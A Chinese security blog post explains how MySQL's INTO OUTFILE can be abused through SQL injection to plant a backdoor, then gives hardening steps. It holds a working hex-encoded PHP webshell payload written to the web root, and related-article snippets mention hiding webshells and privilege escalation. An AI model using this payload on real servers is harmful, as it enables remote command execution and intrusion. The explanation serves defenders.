利用Mysql into outfile给网站留后门

最新推荐文章于 2024-05-05 09:26:59 发布
最新推荐文章于 2024-05-05 09:26:59 发布
阅读量9.6k 收藏 3
点赞数
分类专栏: Database 文章标签: mysql sql注入 into-outfi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlxxcc/article/details/52637873
版权

Mysql into outfile

使用Mysql into outfile语句,可以方便导出表格的数据。同样也可以生成某些文件。因此有些人会利用sql注入生成特定代码的文件,然后执行这些文件。将会造成严重的后果。

Mysql into outfile 生成PHP文件

SELECT 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E into outfile ‘/var/www/html/fuck.php’

最后会在/var/www/html/路径下, 生成fuck.php文件, 文件内容是

安全配置

1、关闭Http远程访问权限
vim /etc/httpd/conf/httpd.conf

<Directory "/var/www/html>
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Deny from all #拒绝远程访问
</Directory>

2、mysql 用户禁用文件写入权限
关闭mysql 用户文件写入权限,那么上述的into outfile sql语句便不能创建文件了。

xlxxcc
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用SELECT… INTO OUTFILE语句导出MySQL数据的教程
12-15
MySQL中,SELECT… INTO OUTFILE语句是一个非常实用的功能,用于将查询结果直接导出到服务器主机上的文件。这个语句将数据以特定的格式保存,方便进行数据备份、迁移或者进一步处理。以下是关于使用SELECT… INTO ...
如何更简单的你的webshell后门
denseryan专栏
07-01 560
得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了! 所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的,! 1.下面教一种很菜的方法,ASP插入法,不容易被发现~  在我们要做手脚的ASP文件里加入如下内容 *********************** 在***********处加入你的shell代码 就可以了
linux 内网怎样后门,内网渗透 day8-linux提权和后门植入
weixin_33821888的博客
05-15 428
linux提权和后门植入1. 脏牛漏洞复现(1) 去网页上把dirty.c中的代码复下来,制然后touch(创建)一个.c文件,vi或者vim打开将代码复制进去保存(不能在kali上直接wget下载https://github.com/FireFart/dirtycow/blob/master/dirty.c,因为这样会把整个网页下载下来(亲测))(2) 进入shell然后从kali开的apach...
网安知识系列:MySQL注入中的outfile、dumpfile、load_file函数详解
最新发布
weixin_54626591的博客
05-05 142
MySQL注入中的outfile、dumpfile、load_file函数详解
超浅谈web安全中的sql注入以及上传后门
fishermanmax的博客
10-30 3334
先上几道好吃的菜:firefox的hackbar工具。可以灵活的处理URL里的各种方式的加密解密。 硬菜:sqlmap 自动检测一个网站的各种可能存在的注入。-D 指定库 -T 指定表 -C 指定列 -dump-all全导出 (以下内容只在.php上面进行相应的测试,没有因为什么,因为我是只会PHP的菜鸟...) 一般的sql URL攻击步骤:  1、在index.php?
SQL注入写入webshell的方法(union select写入)
faclon666的博客
03-30 1283
(菜鸟一枚,日常记录,写的不对的地方欢迎大家指正)
3-1SQL注入网站实例:注入步骤
VN520的博客
07-27 761
在第三部分,我们主要是详细的给大家演示,如何对一个网站进行SQL注入入侵的,这个入侵过程中,它是如何发现注入点的,发现和测试注入点之后,我们要如何来获得爆库、爆表、爆密码,甚至控制后台,一旦获得网站控制后台之后,更有甚者,要如何与数据库层、系统层进行交互提权,以便进一步控制数据库和操作系统,所有这些又是如何发生的我们将通过详细的注入实例,我们从中吸取教训,从安全角度来说,我们要如何来预防mysql注入的高级黑客,这就是我们第三部分所要解决的问题。
用SELECT... INTO OUTFILE语句导出MySQL数据的教程
09-10
INTO OUTFILE`语句是MySQL提供的一种便捷方式,允许用户将查询结果直接导出到服务器主机上的文本文件。这个功能对于数据库管理员和数据分析师来说非常实用,因为它简化了数据提取的过程。 使用`SELECT... INTO ...
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
在这个话题中,我们将深入探讨三个与文件操作相关的MySQL函数:`INTO OUTFILE`、`INTO DUMPFILE`和`LOAD_FILE()`,它们在SQL注入攻击中扮演着重要角色。 1. `INTO OUTFILE`: 这个函数用于将查询结果直接导出到一...
Linux利用UDF库实现Mysql提权
09-10
5. **加载UDF库**:将库文件的十六进制表示写入数据库,可以使用`SELECT hex(load_file('path_to_file')) INTO OUTFILE 'output_file'`语句。然后,将这个十六进制数据转换回二进制文件,写入MySQL的插件目录,例如`...
PHP+MySQL网站注入.pdf
10-10
一旦攻击者获得了数据库连接信息,如果服务器允许远程SQL连接,他们就可以利用这些信息连接到数据库,并执行如`insert`和`into outfile`等语句,将恶意PHP代码写入数据库并在Web目录下创建文件,实现远程控制服务器...
Mysql 导入导出csv 中文乱码问题的解决方法
09-10
SELECT * INTO OUTFILE '/test.csv' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' FROM table_name; ``` 如果在导出后发现中文乱码,通常是由于默认导出的CSV文件采用的是非...
MySQL 8.0 参考手册教程pdf
09-19
INTO OUTFILE`将查询结果导出到文件,然后用`LOAD DATA INFILE`导入。 检索表中的信息是数据库操作的核心。`SELECT`语句用于获取数据,它可以按需求选择所有数据、特定行、特定列,并对结果进行排序。基本的`...
outfile.sql
09-05
outfile.sql
MySQL+数据导入导出+实用技巧
04-23
本文将详细介绍 MySQL 中数据导入导出的方法,包括 `SELECT INTO OUTFILE` 和 `LOAD DATA INFILE` 的使用,并提供一些实用技巧。 #### 二、数据导出:SELECT INTO OUTFILE ##### 2.1 基本概念 `SELECT INTO ...
导出mysql表数据到本地CSV文件
03-22
4. **执行SQL语句**:在你的MySQL客户端工具中执行这个带有`INTO OUTFILE`的SELECT语句。一旦执行成功,MySQL会将查询结果写入指定的CSV文件。 5. **数据安全与权限**:确保在执行此操作时,你遵循了最佳的安全实践...
sql注入和phpmyadmin日志写入webshell
weixin_54813510的博客
05-25 1728
写入webshell的前提条件:1、需要root权限。2、知道网站根目录的绝对路径。3、数据库my.ini配置文件需要secure_file_priv配置为空。
web十大漏洞--sql注入
m0_71907084的博客
10-30 1506
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
渗透测试——五、网站漏洞——SQL注入
热门推荐
钟言的博客
12-05 1万+
本篇为学习渗透测试第五课,网站漏洞即SQL注入,详细内容如下:一、走进DVWA测试网站 1、网站渗透测试步骤 2、DVWA网站 3、其他漏洞网站 4、进入DVMA网站 二、暴力破解和SQL注入 1、暴力破解 2、SQL语句 3、PHP语言 4、暴力破解页面之Burp Suite破解 5、暴力破解页面之SQL注入 6、SQL注入页面之 SQL注入 7、SQL注入(盲注)页面之 SQL注人 8、SQL注入(盲注)页面之SQLMap 自动注入等等
mysql into outfile
03-16
mysql into outfileMySQL数据库中的一种命令,用于将查询结果输出到指定的文件中。具体用法如下: SELECT * INTO OUTFILE '文件路径' FROM 表名; 其中,文件路径为需要输出的文件路径,表名为需要查询的表名。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值